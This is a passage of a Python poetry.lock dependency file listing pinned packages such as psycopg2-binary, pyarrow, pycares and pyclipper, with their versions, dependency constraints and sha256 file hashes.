"psycopg2_binary-2.9.9-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:8532fd6e6e2dc57bcb3bc90b079c60de896d2128c5d9d6f24a63875a95a088cf"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8f8544b092a29a6ddd72f3556a9fcf249ec412e10ad28be6a0c0d948924f2212"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2d423c8d8a3c82d08fe8af900ad5b613ce3632a1249fd6a223941d0735fce493"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2e5afae772c00980525f6d6ecf7cbca55676296b580c0e6abb407f15f3706996"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6e6f98446430fdf41bd36d4faa6cb409f5140c1c2cf58ce0bbdaf16af7d3f119"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:c77e3d1862452565875eb31bdb45ac62502feabbd53429fdc39a1cc341d681ba"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:cb16c65dcb648d0a43a2521f2f0a2300f40639f6f8c1ecbc662141e4e3e1ee07"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:911dda9c487075abd54e644ccdf5e5c16773470a6a5d3826fda76699410066fb"}, {file = "psycopg2_binary-2.9.9-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:57fede879f08d23c85140a360c6a77709113efd1c993923c59fde17aa27599fe"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:2293b001e319ab0d869d660a704942c9e2cce19745262a8aba2115ef41a0a42a"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:03ef7df18daf2c4c07e2695e8cfd5ee7f748a1d54d802330985a78d2a5a6dca9"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0a602ea5aff39bb9fac6308e9c9d82b9a35c2bf288e184a816002c9fae930b77"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:8359bf4791968c5a78c56103702000105501adb557f3cf772b2c207284273984"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:275ff571376626195ab95a746e6a04c7df8ea34638b99fc11160de91f2fef503"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:f9b5571d33660d5009a8b3c25dc1db560206e2d2f89d3df1cb32d72c0d117d52"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:420f9bbf47a02616e8554e825208cb947969451978dceb77f95ad09c37791dae"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:4154ad09dac630a0f13f37b583eae260c6aa885d67dfbccb5b02c33f31a6d420"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:a148c5d507bb9b4f2030a2025c545fccb0e1ef317393eaba42e7eabd28eb6041"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-win32.whl", hash = "sha256:68fc1f1ba168724771e38bee37d940d2865cb0f562380a1fb1ffb428b75cb692"}, {file = "psycopg2_binary-2.9.9-cp37-cp37m-win_amd64.whl", hash = "sha256:281309265596e388ef483250db3640e5f414168c5a67e9c665cafce9492eda2f"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:60989127da422b74a04345096c10d416c2b41bd7bf2a380eb541059e4e999980"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:246b123cc54bb5361588acc54218c8c9fb73068bf227a4a531d8ed56fa3ca7d6"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:34eccd14566f8fe14b2b95bb13b11572f7c7d5c36da61caf414d23b91fcc5d94"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:18d0ef97766055fec15b5de2c06dd8e7654705ce3e5e5eed3b6651a1d2a9a152"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d3f82c171b4ccd83bbaf35aa05e44e690113bd4f3b7b6cc54d2219b132f3ae55"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ead20f7913a9c1e894aebe47cccf9dc834e1618b7aa96155d2091a626e59c972"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:ca49a8119c6cbd77375ae303b0cfd8c11f011abbbd64601167ecca18a87e7cdd"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:323ba25b92454adb36fa425dc5cf6f8f19f78948cbad2e7bc6cdf7b0d7982e59"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:1236ed0952fbd919c100bc839eaa4a39ebc397ed1c08a97fc45fee2a595aa1b3"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:729177eaf0aefca0994ce4cffe96ad3c75e377c7b6f4efa59ebf003b6d398716"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-win32.whl", hash = "sha256:804d99b24ad523a1fe18cc707bf741670332f7c7412e9d49cb5eab67e886b9b5"}, {file = "psycopg2_binary-2.9.9-cp38-cp38-win_amd64.whl", hash = "sha256:a6cdcc3ede532f4a4b96000b6362099591ab4a3e913d70bcbac2b56c872446f7"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:72dffbd8b4194858d0941062a9766f8297e8868e1dd07a7b36212aaa90f49472"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:30dcc86377618a4c8f3b72418df92e77be4254d8f89f14b8e8f57d6d43603c0f"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:31a34c508c003a4347d389a9e6fcc2307cc2150eb516462a7a17512130de109e"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:15208be1c50b99203fe88d15695f22a5bed95ab3f84354c494bcb1d08557df67"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1873aade94b74715be2246321c8650cabf5a0d098a95bab81145ffffa4c13876"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3a58c98a7e9c021f357348867f537017057c2ed7f77337fd914d0bedb35dace7"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:4686818798f9194d03c9129a4d9a702d9e113a89cb03bffe08c6cf799e053291"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:ebdc36bea43063116f0486869652cb2ed7032dbc59fbcb4445c4862b5c1ecf7f"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:ca08decd2697fdea0aea364b370b1249d47336aec935f87b8bbfd7da5b2ee9c1"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:ac05fb791acf5e1a3e39402641827780fe44d27e72567a000412c648a85ba860"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-win32.whl", hash = "sha256:9dba73be7305b399924709b91682299794887cbbd88e38226ed9f6712eabee90"}, {file = "psycopg2_binary-2.9.9-cp39-cp39-win_amd64.whl", hash = "sha256:f7ae5d65ccfbebdfa761585228eb4d0df3a8b15cfb53bd953e713e09fbb12957"}, ] [[package]] name = "ptyprocess" version = "0.7.0" description = "Run a subprocess in a pseudo terminal" optional = false python-versions = "*" files = [ {file = "ptyprocess-0.7.0-py2.py3-none-any.whl", hash = "sha256:4b41f3967fce3af57cc7e94b888626c18bf37a083e3651ca8feeb66d492fef35"}, {file = "ptyprocess-0.7.0.tar.gz", hash = "sha256:5c5d0a3b48ceee0b48485e0c26037c0acd7d29765ca3fbb5cb3831d347423220"}, ] [[package]] name = "pure-eval" version = "0.2.2" description = "Safely evaluate AST nodes without side effects" optional = false python-versions = "*" files = [ {file = "pure_eval-0.2.2-py3-none-any.whl", hash = "sha256:01eaab343580944bc56080ebe0a674b39ec44a945e6d09ba7db3cb8cec289350"}, {file = "pure_eval-0.2.2.tar.gz", hash = "sha256:2b45320af6dfaa1750f543d714b6d1c520a1688dec6fd24d339063ce0aaa9ac3"}, ] [package.extras] tests = ["pytest"] [[package]] name = "py" version = "1.11.0" description = "library with cross-python path, ini-parsing, io, code, log facilities" optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" files = [ {file = "py-1.11.0-py2.py3-none-any.whl", hash = "sha256:607c53218732647dff4acdfcd50cb62615cedf612e72d1724fb1a0cc6405b378"}, {file = "py-1.11.0.tar.gz", hash = "sha256:51c75c4126074b472f746a24399ad32f6053d1b34b68d2fa41e558e6f4a98719"}, ] [[package]] name = "py-trello" version = "0.19.0" description = "Python wrapper around the Trello API" optional = true python-versions = "*" files = [ {file = "py-trello-0.19.0.tar.gz", hash = "sha256:f4a8c05db61fad0ef5fa35d62c29806c75d9d2b797358d9cf77275e2cbf23020"}, ] [package.dependencies] python-dateutil = "*" pytz = "*" requests = "*" requests-oauthlib = ">=0.4.1" [[package]] name = "py4j" version = "0.10.9.7" description = "Enables Python programs to dynamically access arbitrary Java objects" optional = true python-versions = "*" files = [ {file = "py4j-0.10.9.7-py2.py3-none-any.whl", hash = "sha256:85defdfd2b2376eb3abf5ca6474b51ab7e0de341c75a02f46dc9b5976f5a5c1b"}, {file = "py4j-0.10.9.7.tar.gz", hash = "sha256:0b6e5315bb3ada5cf62ac651d107bb2ebc02def3dee9d9548e3baac644ea8dbb"}, ] [[package]] name = "pyaes" version = "1.6.1" description = "Pure-Python Implementation of the AES block-cipher and common modes of operation" optional = true python-versions = "*" files = [ {file = "pyaes-1.6.1.tar.gz", hash = "sha256:02c1b1405c38d3c370b085fb952dd8bea3fadcee6411ad99f312cc129c536d8f"}, ] [[package]] name = "pyarrow" version = "13.0.0" description = "Python library for Apache Arrow" optional = true python-versions = ">=3.8" files = [ {file = "pyarrow-13.0.0-cp310-cp310-macosx_10_14_x86_64.whl", hash = "sha256:1afcc2c33f31f6fb25c92d50a86b7a9f076d38acbcb6f9e74349636109550148"}, {file = "pyarrow-13.0.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:70fa38cdc66b2fc1349a082987f2b499d51d072faaa6b600f71931150de2e0e3"}, {file = "pyarrow-13.0.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cd57b13a6466822498238877892a9b287b0a58c2e81e4bdb0b596dbb151cbb73"}, {file = "pyarrow-13.0.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f8ce69f7bf01de2e2764e14df45b8404fc6f1a5ed9871e8e08a12169f87b7a26"}, {file = "pyarrow-13.0.0-cp310-cp310-manylinux_2_28_aarch64.whl", hash = "sha256:588f0d2da6cf1b1680974d63be09a6530fd1bd825dc87f76e162404779a157dc"}, {file = "pyarrow-13.0.0-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:6241afd72b628787b4abea39e238e3ff9f34165273fad306c7acf780dd850956"}, {file = "pyarrow-13.0.0-cp310-cp310-win_amd64.whl", hash = "sha256:fda7857e35993673fcda603c07d43889fca60a5b254052a462653f8656c64f44"}, {file = "pyarrow-13.0.0-cp311-cp311-macosx_10_14_x86_64.whl", hash = "sha256:aac0ae0146a9bfa5e12d87dda89d9ef7c57a96210b899459fc2f785303dcbb67"}, {file = "pyarrow-13.0.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:d7759994217c86c161c6a8060509cfdf782b952163569606bb373828afdd82e8"}, {file = "pyarrow-13.0.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:868a073fd0ff6468ae7d869b5fc1f54de5c4255b37f44fb890385eb68b68f95d"}, {file = "pyarrow-13.0.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:51be67e29f3cfcde263a113c28e96aa04362ed8229cb7c6e5f5c719003659d33"}, {file = "pyarrow-13.0.0-cp311-cp311-manylinux_2_28_aarch64.whl", hash = "sha256:d1b4e7176443d12610874bb84d0060bf080f000ea9ed7c84b2801df851320295"}, {file = "pyarrow-13.0.0-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:69b6f9a089d116a82c3ed819eea8fe67dae6105f0d81eaf0fdd5e60d0c6e0944"}, {file = "pyarrow-13.0.0-cp311-cp311-win_amd64.whl", hash = "sha256:ab1268db81aeb241200e321e220e7cd769762f386f92f61b898352dd27e402ce"}, {file = "pyarrow-13.0.0-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:ee7490f0f3f16a6c38f8c680949551053c8194e68de5046e6c288e396dccee80"}, {file = "pyarrow-13.0.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:e3ad79455c197a36eefbd90ad4aa832bece7f830a64396c15c61a0985e337287"}, {file = "pyarrow-13.0.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:68fcd2dc1b7d9310b29a15949cdd0cb9bc34b6de767aff979ebf546020bf0ba0"}, {file = "pyarrow-13.0.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dc6fd330fd574c51d10638e63c0d00ab456498fc804c9d01f2a61b9264f2c5b2"}, {file = "pyarrow-13.0.0-cp38-cp38-manylinux_2_28_aarch64.whl", hash = "sha256:e66442e084979a97bb66939e18f7b8709e4ac5f887e636aba29486ffbf373763"}, {file = "pyarrow-13.0.0-cp38-cp38-manylinux_2_28_x86_64.whl", hash = "sha256:0f6eff839a9e40e9c5610d3ff8c5bdd2f10303408312caf4c8003285d0b49565"}, {file = "pyarrow-13.0.0-cp38-cp38-win_amd64.whl", hash = "sha256:8b30a27f1cddf5c6efcb67e598d7823a1e253d743d92ac32ec1eb4b6a1417867"}, {file = "pyarrow-13.0.0-cp39-cp39-macosx_10_14_x86_64.whl", hash = "sha256:09552dad5cf3de2dc0aba1c7c4b470754c69bd821f5faafc3d774bedc3b04bb7"}, {file = "pyarrow-13.0.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:3896ae6c205d73ad192d2fc1489cd0edfab9f12867c85b4c277af4d37383c18c"}, {file = "pyarrow-13.0.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6647444b21cb5e68b593b970b2a9a07748dd74ea457c7dadaa15fd469c48ada1"}, {file = "pyarrow-13.0.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:47663efc9c395e31d09c6aacfa860f4473815ad6804311c5433f7085415d62a7"}, {file = "pyarrow-13.0.0-cp39-cp39-manylinux_2_28_aarch64.whl", hash = "sha256:b9ba6b6d34bd2563345488cf444510588ea42ad5613df3b3509f48eb80250afd"}, {file = "pyarrow-13.0.0-cp39-cp39-manylinux_2_28_x86_64.whl", hash = "sha256:d00d374a5625beeb448a7fa23060df79adb596074beb3ddc1838adb647b6ef09"}, {file = "pyarrow-13.0.0-cp39-cp39-win_amd64.whl", hash = "sha256:c51afd87c35c8331b56f796eff954b9c7f8d4b7fef5903daf4e05fcf017d23a8"}, {file = "pyarrow-13.0.0.tar.gz", hash = "sha256:83333726e83ed44b0ac94d8d7a21bbdee4a05029c3b1e8db58a863eec8fd8a33"}, ] [package.dependencies] numpy = ">=1.16.6" [[package]] name = "pyasn1" version = "0.5.0" description = "Pure-Python implementation of ASN.1 types and DER/BER/CER codecs (X.208)" optional = true python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,>=2.7" files = [ {file = "pyasn1-0.5.0-py2.py3-none-any.whl", hash = "sha256:87a2121042a1ac9358cabcaf1d07680ff97ee6404333bacca15f76aa8ad01a57"}, {file = "pyasn1-0.5.0.tar.gz", hash = "sha256:97b7290ca68e62a832558ec3976f15cbf911bf5d7c7039d8b861c2a0ece69fde"}, ] [[package]] name = "pyasn1-modules" version = "0.3.0" description = "A collection of ASN.1-based protocols modules" optional = true python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,>=2.7" files = [ {file = "pyasn1_modules-0.3.0-py2.py3-none-any.whl", hash = "sha256:d3ccd6ed470d9ffbc716be08bd90efbd44d0734bc9303818f7336070984a162d"}, {file = "pyasn1_modules-0.3.0.tar.gz", hash = "sha256:5bd01446b736eb9d31512a30d46c1ac3395d676c6f3cafa4c03eb54b9925631c"}, ] [package.dependencies] pyasn1 = ">=0.4.6,<0.6.0" [[package]] name = "pycares" version = "4.4.0" description = "Python interface for c-ares" optional = true python-versions = ">=3.8" files = [ {file = "pycares-4.4.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:24da119850841d16996713d9c3374ca28a21deee056d609fbbed29065d17e1f6"}, {file = "pycares-4.4.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:8f64cb58729689d4d0e78f0bfb4c25ce2f851d0274c0273ac751795c04b8798a"}, {file = "pycares-4.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d33e2a1120887e89075f7f814ec144f66a6ce06a54f5722ccefc62fbeda83cff"}, {file = "pycares-4.4.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c680fef1b502ee680f8f0b95a41af4ec2c234e50e16c0af5bbda31999d3584bd"}, {file = "pycares-4.4.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fff16b09042ba077f7b8aa5868d1d22456f0002574d0ba43462b10a009331677"}, {file = "pycares-4.4.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:229a1675eb33bc9afb1fc463e73ee334950ccc485bc83a43f6ae5839fb4d5fa3"}, {file = "pycares-4.4.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:3aebc73e5ad70464f998f77f2da2063aa617cbd8d3e8174dd7c5b4518f967153"}, {file = "pycares-4.4.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:6ef64649eba56448f65e26546d85c860709844d2fc22ef14d324fe0b27f761a9"}, {file = "pycares-4.4.0-cp310-cp310-win32.whl", hash = "sha256:4afc2644423f4eef97857a9fd61be9758ce5e336b4b0bd3d591238bb4b8b03e0"}, {file = "pycares-4.4.0-cp310-cp310-win_amd64.whl", hash = "sha256:5ed4e04af4012f875b78219d34434a6d08a67175150ac1b79eb70ab585d4ba8c"}, {file = "pycares-4.4.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:bce8db2fc6f3174bd39b81405210b9b88d7b607d33e56a970c34a0c190da0490"}, {file = "pycares-4.4.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:9a0303428d013ccf5c51de59c83f9127aba6200adb7fd4be57eddb432a1edd2a"}, {file = "pycares-4.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:afb91792f1556f97be7f7acb57dc7756d89c5a87bd8b90363a77dbf9ea653817"}, {file = "pycares-4.4.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b61579cecf1f4d616e5ea31a6e423a16680ab0d3a24a2ffe7bb1d4ee162477ff"}, {file = "pycares-4.4.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b7af06968cbf6851566e806bf3e72825b0e6671832a2cbe840be1d2d65350710"}, {file = "pycares-4.4.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:ceb12974367b0a68a05d52f4162b29f575d241bd53de155efe632bf2c943c7f6"}, {file = "pycares-4.4.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:2eeec144bcf6a7b6f2d74d6e70cbba7886a84dd373c886f06cb137a07de4954c"}, {file = "pycares-4.4.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:e3a6f7cfdfd11eb5493d6d632e582408c8f3b429f295f8799c584c108b28db6f"}, {file = "pycares-4.4.0-cp311-cp311-win32.whl", hash = "sha256:34736a2ffaa9c08ca9c707011a2d7b69074bbf82d645d8138bba771479b2362f"}, {file = "pycares-4.4.0-cp311-cp311-win_amd64.whl", hash = "sha256:eb66c30eb11e877976b7ead13632082a8621df648c408b8e15cdb91a452dd502"}, {file = "pycares-4.4.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:fd644505a8cfd7f6584d33a9066d4e3d47700f050ef1490230c962de5dfb28c6"}, {file = "pycares-4.4.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:52084961262232ec04bd75f5043aed7e5d8d9695e542ff691dfef0110209f2d4"}, {file = "pycares-4.4.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a0c5368206057884cde18602580083aeaad9b860e2eac14fd253543158ce1e93"}, {file = "pycares-4.4.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:112a4979c695b1c86f6782163d7dec58d57a3b9510536dcf4826550f9053dd9a"}, {file = "pycares-4.4.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8d186dafccdaa3409194c0f94db93c1a5d191145a275f19da6591f9499b8e7b8"}, {file = "pycares-4.4.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:64965dc19c578a683ea73487a215a8897276224e004d50eeb21f0bc7a0b63c88"}, {file = "pycares-4.4.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:ed2a38e34bec6f2586435f6ff0bc5fe11d14bebd7ed492cf739a424e81681540"}, {file = "pycares-4.4.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:94d6962db81541eb0396d2f0dfcbb18cdb8c8b251d165efc2d974ae652c547d4"}, {file = "pycares-4.4.0-cp312-cp312-win32.whl", hash = "sha256:1168a48a834813aa80f412be2df4abaf630528a58d15c704857448b20b1675c0"}, {file = "pycares-4.4.0-cp312-cp312-win_amd64.whl", hash = "sha256:db24c4e7fea4a052c6e869cbf387dd85d53b9736cfe1ef5d8d568d1ca925e977"}, {file = "pycares-4.4.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:21a5a0468861ec7df7befa69050f952da13db5427ae41ffe4713bc96291d1d95"}, {file = "pycares-4.4.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:22c00bf659a9fa44d7b405cf1cd69b68b9d37537899898d8cbe5dffa4016b273"}, {file = "pycares-4.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:23aa3993a352491a47fcf17867f61472f32f874df4adcbb486294bd9fbe8abee"}, {file = "pycares-4.4.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:813d661cbe2e37d87da2d16b7110a6860e93ddb11735c6919c8a3545c7b9c8d8"}, {file = "pycares-4.4.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:77cf5a2fd5583c670de41a7f4a7b46e5cbabe7180d8029f728571f4d2e864084"}, {file = "pycares-4.4.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:3eaa6681c0a3e3f3868c77aca14b7760fed35fdfda2fe587e15c701950e7bc69"}, {file = "pycares-4.4.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:ad58e284a658a8a6a84af2e0b62f2f961f303cedfe551854d7bd40c3cbb61912"}, {file = "pycares-4.4.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:bfb89ca9e3d0a9b5332deeb666b2ede9d3469107742158f4aeda5ce032d003f4"}, {file = "pycares-4.4.0-cp38-cp38-win32.whl", hash = "sha256:f36bdc1562142e3695555d2f4ac0cb69af165eddcefa98efc1c79495b533481f"}, {file = "pycares-4.4.0-cp38-cp38-win_amd64.whl", hash = "sha256:902461a92b6a80fd5041a2ec5235680c7cc35e43615639ec2a40e63fca2dfb51"}, {file = "pycares-4.4.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:7bddc6adba8f699728f7fc1c9ce8cef359817ad78e2ed52b9502cb5f8dc7f741"}, {file = "pycares-4.4.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:cb49d5805cd347c404f928c5ae7c35e86ba0c58ffa701dbe905365e77ce7d641"}, {file = "pycares-4.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:56cf3349fa3a2e67ed387a7974c11d233734636fe19facfcda261b411af14d80"}, {file = "pycares-4.4.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8bf2eaa83a5987e48fa63302f0fe7ce3275cfda87b34d40fef9ce703fb3ac002"}, {file = "pycares-4.4.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:82bba2ab77eb5addbf9758d514d9bdef3c1bfe7d1649a47bd9a0d55a23ef478b"}, {file = "pycares-4.4.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:c6a8bde63106f162fca736e842a916853cad3c8d9d137e11c9ffa37efa818b02"}, {file = "pycares-4.4.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:f5f646eec041db6ffdbcaf3e0756fb92018f7af3266138c756bb09d2b5baadec"}, {file = "pycares-4.4.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:9dc04c54c6ea615210c1b9e803d0e2d2255f87a3d5d119b6482c8f0dfa15b26b"}, {file = "pycares-4.4.0-cp39-cp39-win32.whl", hash = "sha256:97892cced5794d721fb4ff8765764aa4ea48fe8b2c3820677505b96b83d4ef47"}, {file = "pycares-4.4.0-cp39-cp39-win_amd64.whl", hash = "sha256:917f08f0b5d9324e9a34211e68d27447c552b50ab967044776bbab7e42a553a2"}, {file = "pycares-4.4.0.tar.gz", hash = "sha256:f47579d508f2f56eddd16ce72045782ad3b1b3b678098699e2b6a1b30733e1c2"}, ] [package.dependencies] cffi = ">=1.5.0" [package.extras] idna = ["idna (>=2.1)"] [[package]] name = "pyclipper" version = "1.3.0.post5" description = "Cython wrapper for the C++ translation of the Angus Johnson's Clipper library (ver. 6.4.2)" optional = true python-versions = "*" files = [ {file = "pyclipper-1.3.0.post5-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:3c45f99b8180dd4df4c86642657ca92b7d5289a5e3724521822e0f9461961fe2"}, {file = "pyclipper-1.3.0.post5-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:567ffd419a0bdc3727fa4562cfa1f18484691817a2bc0bc675750aa28ed98bd4"}, {file = "pyclipper-1.3.0.post5-cp310-cp310-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:59c8c75661a6d87e98b1655851578a2917d3c8859912c9a4f1956b9830940fd9"}, {file = "pyclipper-1.3.0.post5-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a496efa146d2d88b59350021739e4685e439dc569b6654e9e6d5e42e9a0b1666"}, {file = "pyclipper-1.3.0.post5-cp310-cp310-win32.whl", hash = "sha256:02a98d09af9b60bcf8e9480d153c0839e20b92689f5602f87242a4933842fecd"}, {file = "pyclipper-1.3.0.post5-cp310-cp310-win_amd64.whl", hash = "sha256:847f1e2fc3994bb498fe675f55c98129b95dc26a5c92304ba4cf0ab40721ea3d"}, {file = "pyclipper-1.3.0.post5-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:b7a983ae019932bfa0a1971a2dc8c856704add5f3d567bed8fac02dbc0e7f0bf"}, {file = "pyclipper-1.3.0.post5-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:d8760075c395b924f894aa16ee06e8c040c6f9b63e0903e49de3cc8d82d9e637"}, {file = "pyclipper-1.3.0.post5-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e4ea61ca5899d3346c614951342c506f119601ed0a1f4889a9cc236558afec6b"}, {file = "pyclipper-1.3.0.post5-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = 